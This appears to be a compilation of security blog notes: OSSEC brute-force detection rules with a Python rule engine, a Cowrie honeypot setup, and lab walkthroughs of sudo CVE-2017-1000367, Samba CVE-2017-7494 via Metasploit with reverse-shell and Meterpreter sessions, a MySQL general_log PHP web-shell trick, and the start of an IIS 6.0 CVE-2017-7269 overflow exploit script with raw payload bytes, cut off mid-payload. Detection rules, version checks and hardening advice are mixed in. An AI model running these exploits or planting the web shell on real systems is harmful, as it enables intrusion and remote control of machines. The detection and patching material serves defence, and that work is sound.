    <include>local_rules.xml</include>
    <include>auditServerd_rules.xml</include>
  </rules>
</ossec_config>

Running /var/ossec/bin/ossec-logtest gives:

**Phase 1: Completed pre-decoding.
       full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
       hostname: '172.17.153.38/172.16.24.32'
       program_name: '/usr/bin/auditServerd'
       log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
       decoder: 'auditServerd'
       dstuser: 'blackrat'
       status: 'SUCEESS'
       srcip: '172.17.153.36'
       dstip: '172.17.153.38'
       dstport: '3333'

**Phase 3: Completed filtering (rules).
       Rule id: '80001'
       Level: '10'
       Description: 'User blackrat is not allowed login from 172.17.153.36!'
**Alert to be generated.

3.3 Correlation rules

OSSEC can raise correlated alerts based on causal relationships and on event frequency, as follows.

Suppose we want an alert when logins to auditServerd from the same IP fail 5 times within 1 minute. The rules are:

<group name="auditServer,">
  <rule id="80000" level="0" noalert="1">
    <decoded_as>auditServerd</decoded_as>
    <description>Grouping for the auditServerd rules.</description>
  </rule>

  <rule id="80001" level="10">
    <if_sid>80000</if_sid>
    <match>SUCEESS</match>
    <user>blackrat</user>
    <srcip>172.17.153.36</srcip>
    <description>User blackrat is not allowed login from 172.17.153.36!</description>
  </rule>

  <rule id="80002" level="1">
    <if_sid>80000</if_sid>
    <match>PWD_ERROR</match>
    <group>authServer_login_failures,</group>
    <description>login auditServerd password error.</description>
  </rule>

  <rule id="80003" level="15" frequency="5" timeframe="60" ignore="30">
    <if_matched_group>authServer_login_failures</if_matched_group>
    <description>auditServerd brute force trying to get access to </description>
    <description>the audit system.</description>
    <same_source_ip />
    <group>authentication_failures,</group>
  </rule>
</group>

Run /var/ossec/bin/ossec-logtest and enter the following log line five times in a row:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .

The result is:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .'
**Phase 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status: 'PWD_ERROR'
srcip: '172.17.153.36'
dstip: '172.17.153.38'
dstport: '3333'

**Phase 3: Completed filtering (rules).
Rule id: '80003'
Level: '15'
Description: 'auditServerd brute force trying to get access to the audit system.'
**Alert to be generated.
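An added Python example (not from the original article) that implements the auditServerd decoder of section 2.2 and rules 80001 to 80003 of this section, including the frequency, timeframe, ignore and same_source_ip semantics. The log lines are constructed in the format shown above, and the syslog timestamp is assumed to carry no year, so only time differences are used.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Optional

# Constructed log lines in the auditServerd format from section 2.2; the
# misspelling SUCEESS is kept because rule 80001 matches on it literally.
SAMPLE_LOG = """\
Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:41 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:52 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:07:03 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User alice login PWD_ERROR from 10.0.0.7 to 172.17.153.38 distport 3333 .
Jun 11 22:07:14 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:07:25 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:07:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERROR from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:07:40 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:07:41 172.17.153.38/172.16.24.32 sshd[100]: Accepted publickey for root from 10.0.0.7 port 38720 ssh2
"""

# Parent decoder (program_name) and the child decoder's regex/order from section 2.2,
# folded into one pattern. Syslog timestamps carry no year (assumed), so only deltas matter.
_LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) /usr/bin/auditServerd\[\d+\]: "
    r"User (?P<user>\S+) login (?P<status>\S+) from (?P<srcip>\S+) to (?P<dstip>\S+) "
    r"distport (?P<dstport>\S+) \.$"
)


def decode(line: str) -> Optional[Dict]:
    """Return the decoded fields (user, status, srcip, dstip, dstport, time) or None."""
    m = _LINE_RE.match(line)
    if m is None:
        return None
    fields = m.groupdict()
    fields["time"] = datetime.strptime(fields["ts"], "%b %d %H:%M:%S")
    return fields


class AuditServerdRules:
    """Rules 80001 (blocked login), 80002 (single failure) and 80003 (brute force)."""
    FREQUENCY, TIMEFRAME, IGNORE = 5, 60, 30  # attributes of rule 80003

    def __init__(self) -> None:
        self.failures: Dict[str, Deque[datetime]] = defaultdict(deque)  # keyed by srcip
        self.ignore_until: Dict[str, datetime] = {}

    def process(self, line: str) -> Optional[Dict]:
        ev = decode(line)
        if ev is None:
            return None  # rule 80000 did not match: not an auditServerd login line
        if ev["status"] == "SUCEESS" and ev["user"] == "blackrat" and ev["srcip"] == "172.17.153.36":
            return {"rule": 80001, "level": 10, "srcip": ev["srcip"]}
        if ev["status"] != "PWD_ERROR":
            return None
        q = self.failures[ev["srcip"]]  # same_source_ip: one window per source address
        q.append(ev["time"])
        while (ev["time"] - q[0]).total_seconds() > self.TIMEFRAME:
            q.popleft()  # drop failures outside the 60 s timeframe
        until = self.ignore_until.get(ev["srcip"])
        if until is None or ev["time"] >= until:
            if len(q) >= self.FREQUENCY:
                q.clear()
                # ignore="30": no repeat of 80003 for this source for 30 s
                self.ignore_until[ev["srcip"]] = ev["time"] + timedelta(seconds=self.IGNORE)
                return {"rule": 80003, "level": 15, "srcip": ev["srcip"]}
        return {"rule": 80002, "level": 1, "srcip": ev["srcip"]}


if __name__ == "__main__":
    engine = AuditServerdRules()
    for raw in SAMPLE_LOG.splitlines():
        print(engine.process(raw))
```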

For the full syntax of OSSEC alert rules, see:
http://ossec-docs.readthedocs.org/en/latest/syntax/head_rules.html

For the syntax of regular expressions in OSSEC, see:
http://ossec-docs.readthedocs.org/en/latest/syntax/regex.html

Source:
http://www.freebuf.com/articles/network/36484.html

[Honeypot] Cowrie: an SSH/Telnet honeypot

0x01 Overview

Cowrie is a medium-interaction SSH honeypot derived from Kippo. Deployed on the public internet it can collect malicious IPs, enrich password dictionaries and capture attack samples; deployed on an internal network it provides intrusion detection and delays an attacker.

 

0x02 Installation

Edit /etc/ssh/sshd_config and change Port 22 to Port 222, then restart the service with systemctl restart sshd.

Like Kippo, Cowrie does not support running as root, and its default listening port is 2222, so port 22 has to be forwarded to 2222 through iptables (here via firewall-cmd):

[root@localhost yum.repos.d]# systemctl start firewalld
[root@localhost yum.repos.d]# firewall-cmd --permanent --add-port=222/tcp
success
[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-masquerade --permanent
success
[root@localhost yum.repos.d]# firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent
success
[root@localhost yum.repos.d]# firewall-cmd --permanent --list-all
public (default)
  interfaces:
  sources:
  services: dhcpv6-client ssh
  ports: 222/tcp
  masquerade: yes
  forward-ports: port=22:proto=tcp:toport=2222:toaddr=
  icmp-blocks:
  rich rules:

[root@localhost yum.repos.d]# firewall-cmd --reload
success

Install Cowrie:

yum install -y epel-release
yum install -y gcc libffi-devel python-devel openssl-devel git python-pip pycrypto
adduser cowrie -p hehe123
git clone https://github.com/micheloosterhof/cowrie.git
chown -R cowrie:cowrie cowrie/
cd cowrie
mv cowrie.cfg.dist cowrie.cfg

Edit cowrie.cfg and uncomment listen_port = 2222, then install the dependencies:

pip install -r requirements.txt

 

0x03 Database setup

[root@localhost data]# pip install mysql-python
[root@localhost data]# yum install mariadb-server mariadb-devel mariadb
[root@localhost data]# systemctl start mariadb
[root@localhost data]# mysqladmin -u root password hehe123

 

MariaDB [(none)]> CREATE DATABASE cowrie;
Query OK, 1 row affected (0.00 sec)

MariaDB [cowrie]> source /home/cowrie/cowrie/doc/sql/mysql.sql;
MariaDB [cowrie]> show tables;
+------------------+
| Tables_in_cowrie |
+------------------+
| auth             |
| clients          |
| downloads        |
| input            |
| keyfingerprints  |
| sensors          |
| sessions         |
| ttylog           |
+------------------+
8 rows in set (0.00 sec)

Then edit the mysql section of cowrie.cfg and start Cowrie:

[root@localhost cowrie]# su cowrie
[cowrie@localhost cowrie]$ ./bin/cowrie start
Not using Python virtual environment
Starting cowrie: [twistd   --umask 0022 --pidfile var/run/cowrie.pid -l log/cowrie.log cowrie ]...

Recorded login attempts:

MariaDB [cowrie]> select * from auth;
+----+--------------+---------+----------+----------+---------------------+
| id | session      | success | username | password | timestamp           |
+----+--------------+---------+----------+----------+---------------------+
|  1 | c66e2505a393 |       1 | root     | hehe123  | 2017-09-13 23:58:48 |
+----+--------------+---------+----------+----------+---------------------+
1 row in set (0.01 sec)

Recorded commands:

MariaDB [cowrie]> select * from input;
+----+--------------+---------------------+-------+---------+---------+
| id | session      | timestamp           | realm | success | input   |
+----+--------------+---------------------+-------+---------+---------+
|  1 | c66e2505a393 | 2017-09-13 23:58:51 | NULL  |       1 | whoami  |
+----+--------------+---------------------+-------+---------+---------+
1 row in set (0.01 sec)

Recorded downloads:

MariaDB [cowrie]> select * from downloads\G
*************************** 1. row ***************************
       id: 1
  session: c66e2505a393
timestamp: 2017-09-14 00:01:23
      url: https://www.baidu.com/img/bd_logo1.png
  outfile: dl/264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5
   shasum: 264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5
1 row in set (0.00 sec)

 

0x04 Directory layout

data/userdb.txt: SSH credential file

[root@localhost cowrie]# cat data/userdb.txt
root:x:!root
root:x:!123456
root:x:*

txtcmds/*: canned output returned for executed commands

[root@localhost bin]# file df
df: ASCII text
[root@localhost bin]# cat df
Filesystem                                              Size  Used Avail Use% Mounted on
rootfs                                                  4.7G  731M  3.8G  17% /
udev                                                     10M     0   10M   0% /dev
tmpfs                                                    25M  192K   25M   1% /run
/dev/disk/by-uuid/65626fdc-e4c5-4539-8745-edc212b9b0af  4.7G  731M  3.8G  17% /
tmpfs                                                   5.0M     0  5.0M   0% /run/lock
tmpfs                                                   101M     0  101M   0% /run/shm

dl/*: files the attacker downloaded with curl/wget.

[root@localhost dl]# ls
264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a302602500c589847f5

bin/playlog: replays a session log; the logs live under log/tty/, and replaying one shows the attacker's command sequence.

[root@localhost cowrie]# ./bin/playlog  log/tty/20170913-233922-21cf6e129ef5-0i.log

data/fs.pickle: the fake filesystem

honeyfs/: contents of the files in the fake filesystem

[root@localhost cowrie]# cat honeyfs/etc/issue
Debian GNU/Linux 7 \n \l

log/cowrie.json: JSON-formatted event output

log/cowrie.log: log/debug output

 

 

CVE-2017-1000367:Sudo本地提权漏洞

漏洞详情
CVE-2017-1000367:当确定tty时,Sudo没有正确解析/ proc / [pid] / stat的内容,本地攻击者可能会使用此方法来覆盖文件系统上的任何文件,从而绕过预期权限或获取root shell。

Preconditions
1) SELinux must be enabled
2) The user must have sudo rights, i.e. an entry in /etc/sudoers (a single NOPASSWD command is enough, as the test below shows)

How to check
CentOS/RHEL/SUSE/openSUSE: rpm -qa|grep sudo
Ubuntu/Debian: dpkg -l sudo

Fix
yum update sudo (on Debian/Ubuntu: apt-get install --only-upgrade sudo)

Fixed versions

1. CentOS/RHEL
CentOS/RHEL 7: 1.8.6p7-22.el7_3
CentOS/RHEL 6: 1.8.6p3-28.el6_9
CentOS/RHEL 5: 1.7.2p1-30.el5_11
2. Ubuntu
Ubuntu 14.04: 1.8.9p5-1ubuntu1.4
Ubuntu 16.04: 1.8.16-0ubuntu1.4
Ubuntu 16.10: 1.8.16-0ubuntu3.2
Ubuntu 17.04: 1.8.19p1-1ubuntu1.1
3. Debian
Debian wheezy: 1.8.5p2-1+nmu3+deb7u3
Debian jessie: 1.8.10p3-1+deb8u4
4. SUSE/openSUSE
1.8.10p3-2.11.1
1.8.10p3-10.5.1
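A version check that goes further than grep, written for this page rather than taken from any of the references: it compares the installed package string (as printed by rpm -q sudo) against the CentOS/RHEL rows of the table above using rpm's own segment-wise ordering (a simplified rpmvercmp without the ~ and ^ rules), so that 16.el7 sorts before 22.el7_3 and 1.8.6p7 before 1.8.6p10. Only the RPM rows are covered; Debian and Ubuntu versions follow dpkg's ordering and should be checked with dpkg --compare-versions instead.

```python
import re

# Fixed builds from the table above, keyed by the dist tag found in the release field.
FIXED = {
    "el7": "1.8.6p7-22.el7_3",
    "el6": "1.8.6p3-28.el6_9",
    "el5": "1.7.2p1-30.el5_11",
}

_SEG = re.compile(r"[0-9]+|[a-zA-Z]+")   # rpm compares runs of digits and runs of letters

def rpmvercmp(a: str, b: str) -> int:
    """rpm's version-segment comparison (simplified: no ~ or ^ handling). Returns -1, 0 or 1."""
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return -1 if int(x) < int(y) else 1
        elif x.isdigit():            # a numeric segment is newer than an alphabetic one
            return 1
        elif y.isdigit():
            return -1
        elif x != y:
            return -1 if x < y else 1
    return (len(sa) > len(sb)) - (len(sa) < len(sb))   # more segments wins

def split_evr(pkg: str):
    """'sudo-1.8.6p7-16.el7.x86_64' -> ('1.8.6p7', '16.el7')"""
    name = pkg
    if name.endswith((".x86_64", ".i686", ".noarch")):
        name = name.rsplit(".", 1)[0]
    _, version, release = name.rsplit("-", 2)
    return version, release

def is_vulnerable(installed: str) -> bool:
    """True if the installed sudo is older than the fixed build for its EL release."""
    ver, rel = split_evr(installed)
    m = re.search(r"el\d+", rel)
    if not m or m.group(0) not in FIXED:
        raise ValueError(f"no fixed version known for {installed}")
    fver, frel = FIXED[m.group(0)].split("-", 1)
    c = rpmvercmp(ver, fver) or rpmvercmp(rel, frel)   # version first, then release
    return c < 0

if __name__ == "__main__":
    import subprocess
    try:
        installed = subprocess.run(["rpm", "-q", "sudo"], capture_output=True,
                                   text=True, check=True).stdout.strip()
    except (OSError, subprocess.CalledProcessError):
        # rpm not available here: fall back to the build seen in the CentOS 7 test below
        installed = "sudo-1.8.6p7-16.el7.x86_64"
    print(installed, "VULNERABLE" if is_vulnerable(installed) else "fixed")
```

The sudo-1.8.6p7-16.el7 build from the CentOS 7 test below compares lower than 1.8.6p7-22.el7_3 on the release field alone, which is what makes it vulnerable despite the identical upstream version.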

Test on CentOS 7:
Check the installed sudo version:

[root@localhost yum.repos.d]# rpm -qa | grep sudo
sudo-1.8.6p7-16.el7.x86_64

Grant the test user a sudo rule

[root@localhost yum.repos.d]# grep 'vinc' /etc/sudoers
vinc ALL=(ALL) NOPASSWD: /usr/bin/sum

Check that SELinux is enforcing

[root@localhost yum.repos.d]# getenforce 
Enforcing

Exploit: https://github.com/c0d3z3r0/sudo-CVE-2017-1000367
The unprivileged account vinc has no write permission on /etc/motd:

[vinc@localhost tmp]$ ll /etc/motd
-rw-r--r--. 1 root root 106 Jul 6 19:44 /etc/motd
[vinc@localhost ~]$ echo 1 > /etc/motd
-bash: /etc/motd: Permission denied

Then compile and run the exploit:

[vinc@localhost tmp]$ gcc -o sudopwn sudopwn.c -lutil
[vinc@localhost tmp]$ ./sudopwn 
[vinc@localhost tmp]$ cat /etc/motd 
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.

/etc/motd has been overwritten. With SELinux enabled, sudo reopens the command's standard streams on what it believes is its tty; the exploit makes that lookup resolve to /etc/motd, so the stderr of the one permitted command (/usr/bin/sum complaining about the bogus option) lands in a root-owned file.

References:
http://bbs.pediy.com/thread-218260.htm
https://github.com/c0d3z3r0/sudo-CVE-2017-1000367

Samba remote code execution (CVE-2017-7494)

Samba implements the SMB protocol for Linux and UNIX, so that files, printers and other resources can be shared with other operating systems (e.g. Microsoft Windows). The vulnerability goes back seven years of releases and gives a remote attacker code execution.

CVE ID
CVE-2017-7494

Affected versions
Samba 3.5.0 and every later release before 4.6.4, 4.5.10 and 4.4.14

Summary
An attacker can execute code remotely when all of the following hold:
1. The file/printer sharing port 445 is reachable, e.g. exposed to the internet
2. A share is writable by the attacker
3. The attacker knows (or can guess) the physical path of that share on the server
Samba creates network shares from selected directories; a malicious client that connects to a writable share uploads a shared library and then makes smbd load and execute it, achieving remote code execution. Depending on the server's configuration the code may run as root.

Environment
Target: Kali 172.16.100.180

mkdir /tmp/share # create the share directory
chmod 777 /tmp/share # make it world-writable
vim /etc/samba/smb.conf
[MyShare]
path = /tmp/share
browsable =yes
writable = yes
guest ok = yes
service smb start
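An added check for the preconditions above, not code from Samba or from the Metasploit module: it parses an smb.conf, lists the shares an anonymous client can write to, and reports whether the global workaround from Samba's advisory for CVE-2017-7494, nt pipe support = no, is present (that setting is not mentioned on this page). The sample configuration is constructed from the [MyShare] stanza above plus a read-only share; on a real host feed it the output of testparm -s so that includes and defaults are already expanded.

```python
import configparser

# Constructed sample: the page's [MyShare] plus a read-only share for contrast.
SAMPLE_SMB_CONF = """
[global]
workgroup = WORKGROUP
map to guest = Bad User

[MyShare]
path = /tmp/share
browsable = yes
writable = yes
guest ok = yes

[docs]
path = /srv/docs
read only = yes
guest ok = yes
"""

def _yes(value) -> bool:
    return str(value).strip().lower() in ("yes", "true", "1")

def load_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like; '%' macros are left alone (interpolation off)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp

def exposed_shares(conf: configparser.ConfigParser):
    """Shares that an unauthenticated (guest) client can write to: (name, path) pairs."""
    hits = []
    for share in conf.sections():
        if share.lower() in ("global", "printers", "print$"):
            continue
        s = conf[share]
        # "writable"/"writeable" and "read only = no" are synonyms in smb.conf
        writable = _yes(s.get("writable", s.get("writeable", "no"))) or not _yes(s.get("read only", "yes"))
        guest = _yes(s.get("guest ok", s.get("public", "no")))   # "public" is the synonym
        if writable and guest:
            hits.append((share, s.get("path", "?")))
    return hits

def pipe_support_disabled(conf: configparser.ConfigParser) -> bool:
    """True when the advisory workaround 'nt pipe support = no' is set in [global]."""
    return conf.has_section("global") and not _yes(conf["global"].get("nt pipe support", "yes"))

if __name__ == "__main__":
    conf = load_smb_conf(SAMPLE_SMB_CONF)
    for name, path in exposed_shares(conf):
        print(f"guest-writable share [{name}] at {path}: CVE-2017-7494 preconditions met")
    print("nt pipe support disabled:", pipe_support_disabled(conf))
```

Condition 3 (knowing the path) is why the Metasploit module takes SMB_SHARE_BASE; the checker prints the path for each exposed share because that is exactly what an attacker has to guess, and common defaults such as /tmp or /srv/samba are guessed first. Disabling named-pipe support blocks the loading path but also breaks Windows clients' use of certain pipes, so it is a stopgap until the fixed packages are installed.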

Attacker: Kali 172.16.100.177
Metasploit has a dedicated module for this bug, which can be used to test for it:
https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb
Copy it to /usr/share/metasploit-framework/modules/exploits/linux/samba/
and run reload_all

msf > use exploit/linux/samba/is_known_pipename 
msf exploit(is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_BASE no The remote filesystem path correlating with the SMB share name
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory


Exploit target:

Id Name
-- ----
2 Linux x86


msf exploit(is_known_pipename) > set rhost 172.16.100.180
rhost => 172.16.100.180
msf exploit(is_known_pipename) > set smb_share_base /tmp/share
smb_share_base => /tmp/share
msf exploit(is_known_pipename) > set target 3
target => 3
msf exploit(is_known_pipename) > exploit

[*] Started reverse TCP handler on 172.16.100.177:4444 
[*] 172.16.100.180:445 - Using location \\172.16.100.180\MyShare\ for the path
[*] 172.16.100.180:445 - Payload is stored in //172.16.100.180/MyShare/ as KpKNwIOz.so
[*] 172.16.100.180:445 - Trying location /tmp/share/KpKNwIOz.so...
[*] Command shell session 1 opened (172.16.100.177:4444 -> 172.16.100.180:37166) at 2017-05-27 11:05:56 +0800

whoami
nobody
^Z
Background session 1? [y/N] y
msf exploit(is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.177:4433 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.100.180
[*] Command stager progress: 100.00% (668/668 bytes)
msf exploit(is_known_pipename) > [*] Meterpreter session 2 opened (172.16.100.177:4433 -> 172.16.100.180:37446) at 2017-05-27 11:06:39 +0800

msf exploit(is_known_pipename) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo 
Computer : kali
OS : Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.16-1kali1 (2017-03-24) (x86_64)
Architecture : x64
Meterpreter : x86/linux

Parameters to set:
rhost: the target IP address
rport: the target port, 445 by default
smb_share_base: the share's path on the server, /tmp/share for this target
target: the OS/architecture of the target; this box is 64-bit, so 3
0 -> Auto
1 -> Linux ARM (LE)
2 -> Linux x86
3 -> Linux x86_64

Reference
https://xianzhi.aliyun.com/forum/read/1632.html

Getting a shell from MySQL with general_log

This works on the same principle as the Redis trick of writing a cron job through RDB persistence: database commands change where the server writes its own files, so the attacker gets a file with content they control at a path of their choosing.
Tested on Windows with phpstudy:
Check the general_log settings

mysql> show global variables like "%genera%";
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| general_log      | OFF            |
| general_log_file | E:/WWW/cmd.php |
+------------------+----------------+
2 rows in set (0.02 sec)
mysql> set global general_log='on';
Query OK, 0 rows affected (0.12 sec)
mysql> SET global general_log_file='E:/WWW/cmd.php';
Query OK, 0 rows affected (0.01 sec)
mysql> show global variables like "%genera%";
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| general_log      | ON             |
| general_log_file | E:/WWW/cmd.php |
+------------------+----------------+
2 rows in set (0.00 sec)
mysql> SELECT '<?php @assert($_POST["cmd"]);?>';
+---------------------------------+
| <?php @assert($_POST["cmd"]);?> |
+---------------------------------+
| <?php @assert($_POST["cmd"]);?> |
+---------------------------------+
1 row in set (0.00 sec)

Check the file contents, then connect to it with China Chopper (菜刀).

On Linux, mysqld first needs write permission on the web directory. For the test the web directory was chmod'd to 777; then look at the permissions of the general_log file it created:
[root@server120 html]# ls -al cmd.php
-rw-rw---- 1 mysql mysql 177 May 26 10:33 cmd.php
The mode is 660, so the default Apache account (apache) cannot read it. This has nothing to do with the login umask:

vim /etc/profile
if [ $UID -gt 199 ] && [ "`id -gn`" = "`id -un`" ]; then
    umask 002
else
    umask 022
fi

With a UID above 199 the umask is 002, which would give files 666-002=664 and directories 777-002=775. The general_log file is 660, so the shell umask is not what set it: mysqld applies its own file-creation mask (0660 by default) when it creates log files.

MySQL has a global system variable named secure_file_priv that limits the reach of data import and export, i.e. LOAD DATA, SELECT ... INTO OUTFILE and the LOAD_FILE() function.

secure_file_priv is read-only; it cannot be changed at runtime.

If it is set to a directory name, the server confines import and export to that directory. The directory must already exist; the server does not create it.

If it is empty, there is no restriction, which is an insecure configuration.

If it is NULL, the server disables import and export entirely.

Add the following under [mysqld] in /etc/my.cnf:

secure_file_priv=/tmp/

Note that secure_file_priv only governs the import/export statements above; it does not restrict general_log_file, so the trick at the top of this section still works for any account that holds SUPER. What actually closes it is making sure the mysqld account cannot write into any web-served directory and not granting SUPER to application accounts.

Test:

mysql> select * from test union select 1 into outfile '/opt/mysql.txt';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

mysql> select * from test union select 1 into outfile '/tmp/mysql.txt';

Query OK, 4 rows affected (0.00 sec)

IIS 6.0 remote code execution CVE-2017-7269

Description

The ScStoragePathFromUrl function in the WebDAV service of IIS 6.0 on Windows Server 2003 R2 has a buffer overflow. A remote attacker can execute arbitrary code by sending a PROPFIND request with a long header that begins with "If: <http://". The bug had been exploited in the wild since July/August 2016.

Precondition

WebDAV enabled

Affected versions

Windows Server 2003 R2

Test environment

172.16.100.162, Windows 2003 SP2 32-bit (the bug could not be reproduced on the 64-bit build)

POC

#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('172.16.100.162', 80))

# The request body is empty; everything happens in the oversized If: header.
pay = b'PROPFIND / HTTP/1.1\r\nHost: 172.16.100.162\r\nContent-Length: 0\r\n'
pay += b'If: <http://172.16.100.162/aaaaaaa'
# First overflowing resource tag: UTF-8 sequences that IIS converts to the UTF-16 values the ROP chain needs.
pay += b'\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay += b'>'
pay += b' (Not <locktoken:write1>) <http://172.16.100.162/bbbbbbb'
# Second overflowing tag: the rest of the ROP chain, followed by the shellcode.
